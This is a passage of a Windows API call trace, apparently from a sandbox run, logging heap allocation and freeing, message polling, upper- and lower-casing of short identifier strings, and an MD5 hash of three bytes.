| out: lpMsg=0x8bf3c0) returned 0 [0255.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0255.109] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0255.109] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0255.110] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0255.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0255.110] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0255.110] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0255.110] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0255.110] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.110] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0255.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0255.110] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.110] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0255.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0255.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.111] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.111] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.111] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0255.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0255.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.112] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.112] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0255.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0255.112] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0255.112] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0255.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.112] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0255.112] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.112] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0255.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.113] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.113] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.113] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0255.113] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0255.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0255.113] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.113] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0255.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0255.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0255.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0255.114] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.114] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.114] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0255.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0255.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0255.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0255.114] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0255.114] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0255.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0255.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0255.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.114] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0255.114] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.114] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0255.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0255.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0255.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.115] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0255.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0255.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0255.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.115] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0255.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0255.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0255.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0255.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0255.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0255.116] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0255.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0255.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.116] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.116] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0255.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.116] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0255.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0255.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0255.117] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0255.117] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0255.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0255.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0255.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0255.118] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0255.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0255.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0255.118] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.118] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0255.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0255.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0255.118] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.119] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.119] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0255.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0255.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0255.119] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0255.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0255.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.119] CryptHashData (hHash=0xaa57a0, pbData=0x24b17b8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0255.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0255.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0255.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0255.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0255.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0255.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0255.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0255.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 